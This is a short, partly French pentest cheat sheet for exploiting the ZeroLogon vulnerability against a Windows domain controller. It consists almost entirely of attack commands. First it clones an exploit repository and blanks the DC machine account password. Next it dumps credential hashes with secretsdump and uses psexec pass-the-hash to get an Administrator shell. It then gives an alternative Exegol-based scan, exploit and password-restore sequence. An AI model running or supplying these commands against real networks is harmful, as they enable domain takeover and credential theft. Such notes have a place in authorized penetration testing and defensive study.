ZeroLogon
git clone https://github.com/risksense/zerologon/
cd zerologon
python3 set_empty_pw.py <netbios_dc_name> <dc_ip>
# secretsdump to retrieve a user hash
secretsdump -no-pass'<DOMAIN>/<DC NAME>$@<DC_IP>'
# Get a shell with a user
psexec.py -hashes :<nt_hash> <DOMAIN>/Administrator@<DC_IP>
Avec Exegol, il est possible d’exploiter plus simplement la vulnérabilité:
# Scan for the vulnerability
zerologon-scan 'DC_name' 'DC_IP_address'
# Exploit the vulnerability: set the NT hash to \x00*8
zerologon-exploit 'DC_name' 'DC_IP_address'
# Obtain the Domain Admin's NT hash
secretsdump -no-pass 'Domain'/'DC_computer_account$'@'Domain_controller'
# Obtain the machine account hex encoded password with the domain admin credentials
secretsdump -hashes :'NThash' 'Domain'/'Domain_admin'@'Domain_controller'
# Restore the machine account password
zerologon-restore 'Domain'/'DC_account'@'Domain_controller' -target-ip 'DC_IP_address' -hexpass 'DC_hexpass'